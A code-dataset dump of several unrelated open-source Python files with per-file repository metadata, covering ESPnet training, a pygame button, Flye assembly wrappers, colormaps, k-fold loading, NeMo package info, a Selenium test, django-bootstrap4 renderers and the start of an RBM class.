elif args.backend == "pytorch":
from espnet.asr.pytorch_backend.asr import train
train(args)
else:
raise ValueError("Only chainer and pytorch are supported.")
else:
# FIXME(kamo): Support --model-module
if args.backend == "pytorch":
from espnet.asr.pytorch_backend.asr_mix import train
train(args)
else:
raise ValueError("Only pytorch is supported.")
if __name__ == "__main__":
main(sys.argv[1:])
| 31.438871 | 88 | 0.577376 | [
"Apache-2.0"
] | Advanjef/espnet | espnet/bin/asr_train.py | 20,058 | Python |
# -*- coding=utf-8 -*-
import pygame
from pygame.locals import MOUSEBUTTONDOWN
from pybfcontrol.bf_common import BFControlId,BFBase, TEXT_ALIGN_LEFT,TEXT_ALIGN_MIDDLE
CLICK_EFFECT_TIME = 100
PADING = 4
class BFButton(BFBase):
def __init__(self, parent, rect, text='Button', click=None):
super(BFButton, self).__init__()
self.x,self.y,self.width,self.height = rect
self.bg_color = (225,225,225)
self.parent = parent
self.surface = parent.subsurface(rect)
self.is_hover = False
self.in_click = False
self.click_loss_time = 0
self.click_event_id = -1
self.ctl_id = BFControlId().instance().get_new_id()
self._text = text
self._click = click
self.init_font()
def init_font(self):
white = 100, 100, 100
self.textImage = self.font.render(self._text, True, white)
w, h = self.textImage.get_size()
self._ty = (self.height - h) / 2
if self._text_align == TEXT_ALIGN_LEFT:
self._tx = PADING
elif self._text_align == TEXT_ALIGN_MIDDLE:
self._tx = (self.width - PADING - w) / 2
else:
self._tx = (self.width - PADING * 2 - w)
@property
def text(self):
return self._text
@text.setter
def text(self, value):
self._text = value
self.init_font()
@property
def click(self):
return self._click
@click.setter
def click(self, value):
self._click = value
def clear_hover(self):
self.is_hover = False
def update(self, event):
if self.in_click and event.type == pygame.USEREVENT+1 and BFControlId().instance().click_id == self.ctl_id:
if self._click: self._click(self)
self.click_event_id = -1
return True
x, y = pygame.mouse.get_pos()
if x > self.x and x < self.x + self.width and y > self.y and y < self.y + self.height:
if self.panel: self.panel.clear_hover()
self.is_hover = True
if event.type == MOUSEBUTTONDOWN:
pressed_array = pygame.mouse.get_pressed()
if pressed_array[0]:
self.in_click = True
if self.panel: self.panel.clear_foucs()
self.click_loss_time = pygame.time.get_ticks() + CLICK_EFFECT_TIME
BFControlId().instance().click_id = self.ctl_id
pygame.time.set_timer(pygame.USEREVENT+1,CLICK_EFFECT_TIME-10)
return True
else:
self.is_hover = False
return False
def draw(self):
if self.in_click:
if self.click_loss_time < pygame.time.get_ticks():
self.in_click = False
if not self._visible:
return
if self.in_click:
r,g,b = self.bg_color
k = 0.95
self.surface.fill((r*k, g*k, b*k))
else:
self.surface.fill(self.bg_color)
if self.is_hover:
pygame.draw.rect(self.surface, (0,0,0), (0,0,self.width,self.height), 1)
pygame.draw.rect(self.surface, (100,100,100), (0,0,self.width-1,self.height-1), 1)
layers = 5
r_step = (210-170)/layers
g_step = (225-205)/layers
for i in range(layers):
pygame.draw.rect(self.surface, (170+r_step*i, 205+g_step*i, 255), (i, i, self.width - 2 - i*2, self.height - 2 - i*2), 1)
else:
self.surface.fill(self.bg_color)
pygame.draw.rect(self.surface, (0,0,0), (0,0,self.width,self.height), 1)
pygame.draw.rect(self.surface, (100,100,100), (0,0,self.width-1,self.height-1), 1)
pygame.draw.rect(self.surface, self.bg_color, (0,0,self.width-2,self.height-2), 1)
self.surface.blit(self.textImage, (self._tx, self._ty))
class BFButtonGroup(object):
def __init__(self):
self.btn_list = []
def add_button(self, button):
self.btn_list.append(button)
def make_button(self, screen, rect, text='Button', click=None):
button = BFButton(screen, rect,text=text,click=click)
self.add_button(button)
def update(self, event):
for button in self.btn_list: button.update(event)
def draw(self):
for button in self.btn_list: button.draw()
| 35.430894 | 137 | 0.583983 | [
"MIT"
] | zhangenter/bf_control | pybfcontrol/bf_button.py | 4,358 | Python |
#(c) 2016 by Authors
#This file is a part of ABruijn program.
#Released under the BSD license (see LICENSE file)
"""
Runs repeat/contigger binary
"""
from __future__ import absolute_import
import subprocess
import logging
import os
from flye.utils.utils import which
REPEAT_BIN = "flye-modules"
CONTIGGER_BIN = "flye-modules"
logger = logging.getLogger()
class RepeatException(Exception):
pass
def check_binaries():
if not which(REPEAT_BIN) or not which(CONTIGGER_BIN):
raise RepeatException("Repeat/contigger binaries were not found. "
"Did you run 'make'?")
try:
devnull = open(os.devnull, "w")
subprocess.check_call([REPEAT_BIN, "repeat", "-h"], stderr=devnull)
except subprocess.CalledProcessError as e:
raise RepeatException(str(e))
except OSError as e:
raise RepeatException(str(e))
def analyse_repeats(args, run_params, input_assembly, out_folder,
log_file, config_file):
logger.debug("-----Begin repeat analyser log------")
cmdline = [REPEAT_BIN, "repeat", "--disjointigs", input_assembly,
"--reads", ",".join(args.reads), "--out-dir", out_folder,
"--config", config_file, "--log", log_file,
"--threads", str(args.threads)]
if args.debug:
cmdline.append("--debug")
if args.meta:
cmdline.append("--meta")
if args.keep_haplotypes:
cmdline.append("--keep-haplotypes")
#if args.kmer_size:
# cmdline.extend(["--kmer", str(args.kmer_size)])
cmdline.extend(["--min-ovlp", str(run_params["min_overlap"])])
if args.hifi_error:
cmdline.extend(["--extra-params",
"repeat_graph_ovlp_divergence={}".format(args.hifi_error)])
try:
logger.debug("Running: " + " ".join(cmdline))
subprocess.check_call(cmdline)
except subprocess.CalledProcessError as e:
if e.returncode == -9:
logger.error("Looks like the system ran out of memory")
raise RepeatException(str(e))
except OSError as e:
raise RepeatException(str(e))
def generate_contigs(args, run_params, graph_edges, out_folder,
log_file, config_file, repeat_graph, reads_alignment):
logger.debug("-----Begin contigger analyser log------")
cmdline = [CONTIGGER_BIN, "contigger", "--graph-edges", graph_edges,
"--reads", ",".join(args.reads), "--out-dir", out_folder,
"--config", config_file, "--repeat-graph", repeat_graph,
"--graph-aln", reads_alignment, "--log", log_file,
"--threads", str(args.threads)]
if args.debug:
cmdline.append("--debug")
if args.keep_haplotypes:
cmdline.append("--no-scaffold")
#if args.kmer_size:
# cmdline.extend(["--kmer", str(args.kmer_size)])
cmdline.extend(["--min-ovlp", str(run_params["min_overlap"])])
try:
logger.debug("Running: " + " ".join(cmdline))
subprocess.check_call(cmdline)
except subprocess.CalledProcessError as e:
if e.returncode == -9:
logger.error("Looks like the system ran out of memory")
raise RepeatException(str(e))
except OSError as e:
raise RepeatException(str(e))
| 33.865979 | 83 | 0.624353 | [
"BSD-3-Clause"
] | arun-sub/Flye | flye/assembly/repeat_graph.py | 3,285 | Python |
import json
import typing
import collections
from matplotlib import cm
from matplotlib.colors import Normalize, to_hex, CSS4_COLORS, BASE_COLORS
import matplotlib.pyplot as plt
from clldutils.color import qualitative_colors, sequential_colors, rgb_as_hex
from cldfviz.multiparameter import CONTINUOUS, CATEGORICAL, Parameter
__all__ = ['COLORMAPS', 'hextriplet', 'Colormap']
COLORMAPS = {
CATEGORICAL: ['boynton', 'tol', 'base', 'seq'],
CONTINUOUS: [cm for cm in plt.colormaps() if not cm.endswith('_r')],
}
def hextriplet(s):
"""
Wrap clldutils.color.rgb_as_hex to provide unified error handling.
"""
if s in BASE_COLORS:
return rgb_as_hex([float(d) for d in BASE_COLORS[s]])
if s in CSS4_COLORS:
return CSS4_COLORS[s]
try:
return rgb_as_hex(s)
except (AssertionError, ValueError) as e:
raise ValueError('Invalid color spec: "{}" ({})'.format(s, str(e)))
class Colormap:
def __init__(self, parameter: Parameter, name: typing.Optional[str] = None, novalue=None):
domain = parameter.domain
self.explicit_cm = None
if name and name.startswith('{'):
self.explicit_cm = collections.OrderedDict()
raw = json.loads(name, object_pairs_hook=collections.OrderedDict)
if novalue:
raw.setdefault('None', novalue)
label_to_code = {v: k for k, v in parameter.domain.items()}
for v, c in raw.items():
if (v not in parameter.value_to_code) and v not in label_to_code:
raise ValueError('Colormap value "{}" not in domain {}'.format(
v, list(parameter.value_to_code.keys())))
v = parameter.value_to_code.get(v, label_to_code.get(v))
self.explicit_cm[v] = hextriplet(c)
vals = list(parameter.value_to_code)
if len(vals) > len(self.explicit_cm):
raise ValueError('Colormap {} does not cover all values {}!'.format(
dict(raw), vals))
name = None
# reorder the domain of the parameter (and prune it to valid values):
parameter.domain = collections.OrderedDict(
(c, l) for c, l in sorted(
[i for i in parameter.domain.items() if i[0] in self.explicit_cm],
key=lambda i: list(self.explicit_cm.keys()).index(i[0]))
)
self.novalue = hextriplet(novalue) if novalue else None
self._cm = getattr(cm, name or 'yyy', cm.jet)
if isinstance(domain, tuple):
assert not self.explicit_cm
# Initialize matplotlib colormap and normalizer:
norm = Normalize(domain[0], domain[1])
self.cm = lambda v: to_hex(self._cm(norm(float(v))))
else:
if self.explicit_cm:
self.cm = lambda v: self.explicit_cm[v]
else:
if name == 'seq':
colors = sequential_colors(len(domain))
else:
colors = qualitative_colors(len(domain), set=name)
self.cm = lambda v: dict(zip(domain, colors))[v]
def scalar_mappable(self):
return cm.ScalarMappable(norm=None, cmap=self._cm)
def __call__(self, value):
if value is None:
return self.novalue
return self.cm(value)
| 39.835294 | 94 | 0.599232 | [
"Apache-2.0"
] | cldf/cldfviz | src/cldfviz/colormap.py | 3,386 | Python |
import torch
class KFold:
def __init__(self, dataset, n_fold=10, batch_size=32, num_workers=0, pin_memory=False):
self.fold = 0
self.batch_size = batch_size
self.num_workers = num_workers
self.pin_memory = pin_memory
self.dataset = dataset
self.n_fold = n_fold
self.fold_size = len(self.dataset) // self.n_fold
self.folded_size = self.n_fold * self.fold_size
self.fold_idx = self.fold_split()
def fold_split(self, random_seed=None):
"""
Splitting the folds.
Args:
random_seed: Random seed for reproducibility
Returns:
tensor containing indices for folds, where dim=0 is the fold number
"""
if random_seed is not None:
torch.manual_seed(random_seed)
fold_idx = torch.randperm(self.dataset.__len__())
fold_idx = fold_idx[:self.folded_size].view(-1, self.fold_size)
return fold_idx
def fold_loaders(self, fold=-1):
"""
Loading a specific fold as train and test data loader. If no fold number is provided it returns the next fold. It returns a randomly sampled subset of
the original data set.
Args:
fold: fold number to return
Returns:
(train data loader, test data loader)
"""
if fold == -1:
fold = self.fold
test_fold_idx = self.fold_idx[fold]
train_fold_idx = self.fold_idx[[i for i in range(self.n_fold) if i != fold]].view(-1)
train_loader = torch.utils.data.DataLoader(self.dataset,
batch_size=self.batch_size, # args.batch_size,
num_workers=self.num_workers, # args.loader_num_workers,
pin_memory=self.pin_memory,
sampler=torch.utils.data.SubsetRandomSampler(train_fold_idx))
test_loader = torch.utils.data.DataLoader(self.dataset,
batch_size=self.batch_size, # args.batch_size,
num_workers=self.num_workers, # args.loader_num_workers,
pin_memory=self.pin_memory,
sampler=torch.utils.data.SubsetRandomSampler(test_fold_idx))
self.fold = (self.fold + 1) % self.n_fold
return train_loader, test_loader
| 39.353846 | 158 | 0.555903 | [
"MIT"
] | raharth/PyMatch | pymatch/utils/KFold.py | 2,558 | Python |
# -*- coding: utf-8 -*- #
# Copyright 2011 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http:#www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from google.appengine.api import users
from google.appengine.ext import webapp
from util import *
import webapp2
class WhoAmIHandler(webapp2.RequestHandler):
def get(self):
self.response.out.write(Util.getUsernameFromEmail(users.get_current_user().email()))
app = webapp2.WSGIApplication(
[
('/whoami', WhoAmIHandler),
], debug=True)
| 27.714286 | 88 | 0.736082 | [
"Apache-2.0"
] | lmanul/awty | whoami.py | 970 | Python |
# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
MAJOR = 1
MINOR = 7
PATCH = 0
PRE_RELEASE = 'rc'
# Use the following formatting: (major, minor, patch, pre-release)
VERSION = (MAJOR, MINOR, PATCH, PRE_RELEASE)
__shortversion__ = '.'.join(map(str, VERSION[:3]))
__version__ = '.'.join(map(str, VERSION[:3])) + ''.join(VERSION[3:])
__package_name__ = 'nemo_toolkit'
__contact_names__ = 'NVIDIA'
__contact_emails__ = '[email protected]'
__homepage__ = 'https://docs.nvidia.com/deeplearning/nemo/user-guide/docs/en/stable/'
__repository_url__ = 'https://github.com/nvidia/nemo'
__download_url__ = 'https://github.com/NVIDIA/NeMo/releases'
__description__ = 'NeMo - a toolkit for Conversational AI'
__license__ = 'Apache2'
__keywords__ = 'deep learning, machine learning, gpu, NLP, NeMo, nvidia, pytorch, torch, tts, speech, language'
| 38.944444 | 111 | 0.74679 | [
"Apache-2.0"
] | btarjan/NeMo | nemo/package_info.py | 1,402 | Python |
# Licensed to the Software Freedom Conservancy (SFC) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The SFC licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import pytest
from selenium.common.exceptions import TimeoutException
class TestPageLoadTimeout(object):
@pytest.mark.xfail_phantomjs(
reason='PhantomJS does not implement page load timeouts')
def testShouldTimeoutOnPageLoadTakingTooLong(self, driver, pages):
driver.set_page_load_timeout(0.01)
with pytest.raises(TimeoutException):
pages.load("simpleTest.html")
@pytest.mark.xfail_marionette(
reason='https://bugzilla.mozilla.org/show_bug.cgi?id=1309231')
@pytest.mark.xfail_phantomjs(
reason='PhantomJS does not implement page load timeouts')
def testClickShouldTimeout(self, driver, pages):
pages.load("simpleTest.html")
driver.set_page_load_timeout(0.01)
with pytest.raises(TimeoutException):
driver.find_element_by_id("multilinelink").click()
| 40.219512 | 70 | 0.745907 | [
"Apache-2.0"
] | shubhramittal/selenium | py/test/selenium/webdriver/common/page_load_timeout_tests.py | 1,649 | Python |
from bs4 import BeautifulSoup
from django.forms import (
BaseForm,
BaseFormSet,
BoundField,
CheckboxInput,
CheckboxSelectMultiple,
DateInput,
EmailInput,
FileInput,
MultiWidget,
NumberInput,
PasswordInput,
RadioSelect,
Select,
SelectDateWidget,
TextInput,
URLInput,
)
from django.utils.html import conditional_escape, escape, strip_tags
from django.utils.safestring import mark_safe
from .bootstrap import get_bootstrap_setting
from .exceptions import BootstrapError
from .forms import (
FORM_GROUP_CLASS,
is_widget_with_placeholder,
render_field,
render_form,
render_form_group,
render_label,
)
from .text import text_value
from .utils import add_css_class, render_template_file
try:
# If Django is set up without a database, importing this widget gives RuntimeError
from django.contrib.auth.forms import ReadOnlyPasswordHashWidget
except RuntimeError:
ReadOnlyPasswordHashWidget = None
class BaseRenderer(object):
"""A content renderer."""
def __init__(self, *args, **kwargs):
self.layout = kwargs.get("layout", "")
self.form_group_class = kwargs.get("form_group_class", FORM_GROUP_CLASS)
self.field_class = kwargs.get("field_class", "")
self.label_class = kwargs.get("label_class", "")
self.show_help = kwargs.get("show_help", True)
self.show_label = kwargs.get("show_label", True)
self.exclude = kwargs.get("exclude", "")
self.set_placeholder = kwargs.get("set_placeholder", True)
self.size = self.parse_size(kwargs.get("size", ""))
self.horizontal_label_class = kwargs.get(
"horizontal_label_class", get_bootstrap_setting("horizontal_label_class")
)
self.horizontal_field_class = kwargs.get(
"horizontal_field_class", get_bootstrap_setting("horizontal_field_class")
)
def parse_size(self, size):
size = text_value(size).lower().strip()
if size in ("sm", "small"):
return "small"
if size in ("lg", "large"):
return "large"
if size in ("md", "medium", ""):
return "medium"
raise BootstrapError('Invalid value "%s" for parameter "size" (expected "sm", "md", "lg" or "").' % size)
def get_size_class(self, prefix="form-control"):
if self.size == "small":
return prefix + "-sm"
if self.size == "large":
return prefix + "-lg"
return ""
def _render(self):
return ""
def render(self):
return mark_safe(self._render())
class FormsetRenderer(BaseRenderer):
"""Default formset renderer."""
def __init__(self, formset, *args, **kwargs):
if not isinstance(formset, BaseFormSet):
raise BootstrapError('Parameter "formset" should contain a valid Django Formset.')
self.formset = formset
super().__init__(*args, **kwargs)
def render_management_form(self):
return text_value(self.formset.management_form)
def render_form(self, form, **kwargs):
return render_form(form, **kwargs)
def render_forms(self):
rendered_forms = []
for form in self.formset.forms:
rendered_forms.append(
self.render_form(
form,
layout=self.layout,
form_group_class=self.form_group_class,
field_class=self.field_class,
label_class=self.label_class,
show_label=self.show_label,
show_help=self.show_help,
exclude=self.exclude,
set_placeholder=self.set_placeholder,
size=self.size,
horizontal_label_class=self.horizontal_label_class,
horizontal_field_class=self.horizontal_field_class,
)
)
return "\n".join(rendered_forms)
def get_formset_errors(self):
return self.formset.non_form_errors()
def render_errors(self):
formset_errors = self.get_formset_errors()
if formset_errors:
return render_template_file(
"bootstrap4/form_errors.html",
context={"errors": formset_errors, "form": self.formset, "layout": self.layout},
)
return ""
def _render(self):
return "".join([self.render_errors(), self.render_management_form(), self.render_forms()])
class FormRenderer(BaseRenderer):
"""Default form renderer."""
def __init__(self, form, *args, **kwargs):
if not isinstance(form, BaseForm):
raise BootstrapError('Parameter "form" should contain a valid Django Form.')
self.form = form
super().__init__(*args, **kwargs)
self.error_css_class = kwargs.get("error_css_class", None)
self.required_css_class = kwargs.get("required_css_class", None)
self.bound_css_class = kwargs.get("bound_css_class", None)
self.alert_error_type = kwargs.get("alert_error_type", "non_fields")
self.form_check_class = kwargs.get("form_check_class", "form-check")
def render_fields(self):
rendered_fields = []
for field in self.form:
rendered_fields.append(
render_field(
field,
layout=self.layout,
form_group_class=self.form_group_class,
field_class=self.field_class,
label_class=self.label_class,
form_check_class=self.form_check_class,
show_label=self.show_label,
show_help=self.show_help,
exclude=self.exclude,
set_placeholder=self.set_placeholder,
size=self.size,
horizontal_label_class=self.horizontal_label_class,
horizontal_field_class=self.horizontal_field_class,
error_css_class=self.error_css_class,
required_css_class=self.required_css_class,
bound_css_class=self.bound_css_class,
)
)
return "\n".join(rendered_fields)
def get_fields_errors(self):
form_errors = []
for field in self.form:
if not field.is_hidden and field.errors:
form_errors += field.errors
return form_errors
def render_errors(self, type="all"):
form_errors = None
if type == "all":
form_errors = self.get_fields_errors() + self.form.non_field_errors()
elif type == "fields":
form_errors = self.get_fields_errors()
elif type == "non_fields":
form_errors = self.form.non_field_errors()
if form_errors:
return render_template_file(
"bootstrap4/form_errors.html",
context={"errors": form_errors, "form": self.form, "layout": self.layout, "type": type},
)
return ""
def _render(self):
return self.render_errors(self.alert_error_type) + self.render_fields()
class FieldRenderer(BaseRenderer):
"""Default field renderer."""
# These widgets will not be wrapped in a form-control class
WIDGETS_NO_FORM_CONTROL = (CheckboxInput, RadioSelect, CheckboxSelectMultiple, FileInput)
def __init__(self, field, *args, **kwargs):
if not isinstance(field, BoundField):
raise BootstrapError('Parameter "field" should contain a valid Django BoundField.')
self.field = field
super().__init__(*args, **kwargs)
self.widget = field.field.widget
self.is_multi_widget = isinstance(field.field.widget, MultiWidget)
self.initial_attrs = self.widget.attrs.copy()
self.field_help = text_value(mark_safe(field.help_text)) if self.show_help and field.help_text else ""
self.field_errors = [conditional_escape(text_value(error)) for error in field.errors]
self.form_check_class = kwargs.get("form_check_class", "form-check")
if "placeholder" in kwargs:
# Find the placeholder in kwargs, even if it's empty
self.placeholder = kwargs["placeholder"]
elif get_bootstrap_setting("set_placeholder"):
# If not found, see if we set the label
self.placeholder = field.label
else:
# Or just set it to empty
self.placeholder = ""
if self.placeholder:
self.placeholder = text_value(self.placeholder)
self.addon_before = kwargs.get("addon_before", self.widget.attrs.pop("addon_before", ""))
self.addon_after = kwargs.get("addon_after", self.widget.attrs.pop("addon_after", ""))
self.addon_before_class = kwargs.get(
"addon_before_class", self.widget.attrs.pop("addon_before_class", "input-group-text")
)
self.addon_after_class = kwargs.get(
"addon_after_class", self.widget.attrs.pop("addon_after_class", "input-group-text")
)
# These are set in Django or in the global BOOTSTRAP4 settings, and
# they can be overwritten in the template
error_css_class = kwargs.get("error_css_class", None)
required_css_class = kwargs.get("required_css_class", None)
bound_css_class = kwargs.get("bound_css_class", None)
if error_css_class is not None:
self.error_css_class = error_css_class
else:
self.error_css_class = getattr(field.form, "error_css_class", get_bootstrap_setting("error_css_class"))
if required_css_class is not None:
self.required_css_class = required_css_class
else:
self.required_css_class = getattr(
field.form, "required_css_class", get_bootstrap_setting("required_css_class")
)
if bound_css_class is not None:
self.success_css_class = bound_css_class
else:
self.success_css_class = getattr(field.form, "bound_css_class", get_bootstrap_setting("success_css_class"))
# If the form is marked as form.empty_permitted, do not set required class
if self.field.form.empty_permitted:
self.required_css_class = ""
def restore_widget_attrs(self):
self.widget.attrs = self.initial_attrs.copy()
def add_class_attrs(self, widget=None):
if widget is None:
widget = self.widget
classes = widget.attrs.get("class", "")
if ReadOnlyPasswordHashWidget is not None and isinstance(widget, ReadOnlyPasswordHashWidget):
# Render this is a static control
classes = add_css_class(classes, "form-control-static", prepend=True)
elif not isinstance(widget, self.WIDGETS_NO_FORM_CONTROL):
classes = add_css_class(classes, "form-control", prepend=True)
# For these widget types, add the size class here
classes = add_css_class(classes, self.get_size_class())
elif isinstance(widget, CheckboxInput):
classes = add_css_class(classes, "form-check-input", prepend=True)
elif isinstance(widget, FileInput):
classes = add_css_class(classes, "form-control-file", prepend=True)
if self.field.errors:
if self.error_css_class:
classes = add_css_class(classes, self.error_css_class)
else:
if self.field.form.is_bound:
classes = add_css_class(classes, self.success_css_class)
widget.attrs["class"] = classes
def add_placeholder_attrs(self, widget=None):
if widget is None:
widget = self.widget
placeholder = widget.attrs.get("placeholder", self.placeholder)
if placeholder and self.set_placeholder and is_widget_with_placeholder(widget):
# TODO: Should this be stripped and/or escaped?
widget.attrs["placeholder"] = placeholder
def add_help_attrs(self, widget=None):
if widget is None:
widget = self.widget
if not isinstance(widget, CheckboxInput):
widget.attrs["title"] = widget.attrs.get("title", escape(strip_tags(self.field_help)))
def add_widget_attrs(self):
if self.is_multi_widget:
widgets = self.widget.widgets
else:
widgets = [self.widget]
for widget in widgets:
self.add_class_attrs(widget)
self.add_placeholder_attrs(widget)
self.add_help_attrs(widget)
def list_to_class(self, html, klass):
classes = add_css_class(klass, self.get_size_class())
mapping = [
("<ul", '<div class="{classes}"'.format(classes=classes)),
("</ul>", "</div>"),
("<li", '<div class="{form_check_class}"'.format(form_check_class=self.form_check_class)),
("</li>", "</div>"),
]
for k, v in mapping:
html = html.replace(k, v)
# Apply bootstrap4 classes to labels and inputs.
# A simple 'replace' isn't enough as we don't want to have several 'class' attr definition, which would happen
# if we tried to 'html.replace("input", "input class=...")'
soup = BeautifulSoup(html, features="html.parser")
enclosing_div = soup.find("div", {"class": classes})
if enclosing_div:
for label in enclosing_div.find_all("label"):
label.attrs["class"] = label.attrs.get("class", []) + ["form-check-label"]
try:
label.input.attrs["class"] = label.input.attrs.get("class", []) + ["form-check-input"]
except AttributeError:
pass
return str(soup)
def add_checkbox_label(self, html):
return html + render_label(
content=self.field.label,
label_for=self.field.id_for_label,
label_title=escape(strip_tags(self.field_help)),
label_class="form-check-label",
)
def fix_date_select_input(self, html):
div1 = '<div class="col-4">'
div2 = "</div>"
html = html.replace("<select", div1 + "<select")
html = html.replace("</select>", "</select>" + div2)
return '<div class="row bootstrap4-multi-input">{html}</div>'.format(html=html)
def fix_file_input_label(self, html):
if self.layout != "horizontal":
html = "<br>" + html
return html
def post_widget_render(self, html):
if isinstance(self.widget, RadioSelect):
html = self.list_to_class(html, "radio radio-success")
elif isinstance(self.widget, CheckboxSelectMultiple):
html = self.list_to_class(html, "checkbox")
elif isinstance(self.widget, SelectDateWidget):
html = self.fix_date_select_input(html)
elif isinstance(self.widget, CheckboxInput):
html = self.add_checkbox_label(html)
elif isinstance(self.widget, FileInput):
html = self.fix_file_input_label(html)
return html
def wrap_widget(self, html):
if isinstance(self.widget, CheckboxInput):
# Wrap checkboxes
# Note checkboxes do not get size classes, see #318
html = '<div class="form-check">{html}</div>'.format(html=html)
return html
def make_input_group_addon(self, inner_class, outer_class, content):
if not content:
return ""
if inner_class:
content = '<span class="{inner_class}">{content}</span>'.format(inner_class=inner_class, content=content)
return '<div class="{outer_class}">{content}</div>'.format(outer_class=outer_class, content=content)
@property
def is_input_group(self):
allowed_widget_types = (TextInput, PasswordInput, DateInput, NumberInput, Select, EmailInput, URLInput)
return (self.addon_before or self.addon_after) and isinstance(self.widget, allowed_widget_types)
def make_input_group(self, html):
if self.is_input_group:
before = self.make_input_group_addon(self.addon_before_class, "input-group-prepend", self.addon_before)
after = self.make_input_group_addon(self.addon_after_class, "input-group-append", self.addon_after)
html = self.append_errors("{before}{html}{after}".format(before=before, html=html, after=after))
html = '<div class="input-group">{html}</div>'.format(html=html)
return html
def append_help(self, html):
field_help = self.field_help or None
if field_help:
help_html = render_template_file(
"bootstrap4/field_help_text.html",
context={
"field": self.field,
"field_help": field_help,
"layout": self.layout,
"show_help": self.show_help,
},
)
html += help_html
return html
def append_errors(self, html):
field_errors = self.field_errors
if field_errors:
errors_html = render_template_file(
"bootstrap4/field_errors.html",
context={
"field": self.field,
"field_errors": field_errors,
"layout": self.layout,
"show_help": self.show_help,
},
)
html += errors_html
return html
def append_to_field(self, html):
if isinstance(self.widget, CheckboxInput):
# we have already appended errors and help to checkboxes
# in append_to_checkbox_field
return html
if not self.is_input_group:
# we already appended errors for input groups in make_input_group
html = self.append_errors(html)
return self.append_help(html)
def append_to_checkbox_field(self, html):
if not isinstance(self.widget, CheckboxInput):
# we will append errors and help to normal fields later in append_to_field
return html
html = self.append_errors(html)
return self.append_help(html)
def get_field_class(self):
field_class = self.field_class
if not field_class and self.layout == "horizontal":
field_class = self.horizontal_field_class
return field_class
def wrap_field(self, html):
field_class = self.get_field_class()
if field_class:
html = '<div class="{field_class}">{html}</div>'.format(field_class=field_class, html=html)
return html
def get_label_class(self):
label_class = self.label_class
if not label_class and self.layout == "horizontal":
label_class = self.horizontal_label_class
label_class = add_css_class(label_class, "col-form-label")
label_class = text_value(label_class)
if not self.show_label or self.show_label == "sr-only":
label_class = add_css_class(label_class, "sr-only")
return label_class
def get_label(self):
if self.show_label == "skip":
return None
elif isinstance(self.widget, CheckboxInput):
label = None
else:
label = self.field.label
if self.layout == "horizontal" and not label:
return mark_safe(" ")
return label
def add_label(self, html):
label = self.get_label()
if label:
html = render_label(label, label_for=self.field.id_for_label, label_class=self.get_label_class()) + html
return html
def get_form_group_class(self):
form_group_class = self.form_group_class
if self.field.errors:
if self.error_css_class:
form_group_class = add_css_class(form_group_class, self.error_css_class)
else:
if self.field.form.is_bound:
form_group_class = add_css_class(form_group_class, self.success_css_class)
if self.field.field.required and self.required_css_class:
form_group_class = add_css_class(form_group_class, self.required_css_class)
if self.layout == "horizontal":
form_group_class = add_css_class(form_group_class, "row")
return form_group_class
def wrap_label_and_field(self, html):
return render_form_group(html, self.get_form_group_class())
def _render(self):
# See if we're not excluded
if self.field.name in self.exclude.replace(" ", "").split(","):
return ""
# Hidden input requires no special treatment
if self.field.is_hidden:
return text_value(self.field)
# Render the widget
self.add_widget_attrs()
html = self.field.as_widget(attrs=self.widget.attrs)
self.restore_widget_attrs()
# Start post render
html = self.post_widget_render(html)
html = self.append_to_checkbox_field(html)
html = self.wrap_widget(html)
html = self.make_input_group(html)
html = self.append_to_field(html)
html = self.wrap_field(html)
html = self.add_label(html)
html = self.wrap_label_and_field(html)
return html
class InlineFieldRenderer(FieldRenderer):
"""Inline field renderer."""
def add_error_attrs(self):
field_title = self.widget.attrs.get("title", "")
field_title += " " + " ".join([strip_tags(e) for e in self.field_errors])
self.widget.attrs["title"] = field_title.strip()
def add_widget_attrs(self):
super().add_widget_attrs()
self.add_error_attrs()
def append_to_field(self, html):
return html
def get_field_class(self):
return self.field_class
def get_label_class(self):
return add_css_class(self.label_class, "sr-only")
| 39.285458 | 119 | 0.621744 | [
"Unlicense"
] | Andre-Azu/neigbourhood | env/lib/python3.8/site-packages/bootstrap4/renderers.py | 21,882 | Python |
import tensorflow as tf
import numpy as np
import os
import matplotlib.pyplot as plt
from tqdm import tqdm
class RBM(object):
def __init__(self,num_visible,num_hidden,visible_unit_type='bin',main_dir='/Users/chamalgomes/Documents/Python/GitLab/DeepLearning/KAI PROJECT/rbm/models',
model_name='rbm_model',gibbs_sampling_steps=1,learning_rate=0.01,momentum=0.9,l2=0.001,batch_size=10,
num_epochs=10,stddev=0.1,verbose=0,plot_training_loss=True):
""""
INPUT PARAMETER 1) num_visible: number of visible units in the RBM
INPUT PARAMETER 2) num_hidden: number of hidden units in the RBM
INPUT PARAMETER 3) main_dir: main directory to put the models, data and summary directories
INPUT PARAMETER 4) model_name: name of the model you wanna save the data
INPUT PARAMETER 5) gibbs_sampling_steps: Default 1 (Hence Optional)
INPUT PARAMETER 6) learning_rate: Default 0.01 (Hence Optional)
INPUT PARAMETER 7) momentum: Default 0.9(Hence Optional) for Gradient Descent
INPUT PARAMETER 8) l2: l2 regularization lambda value for weight decay Default 0.001(Hence Optional)
INPUT PARAMETER 9) batch_size: Default 10 (Hence Optional)
INPUT PARAMETER 10) num_epochs: Default 10 (Hence Optional)
INPUT PARAMETER 11) stddev: optional, default 0.1. Ignored if visible_unit_type is not 'gauss'
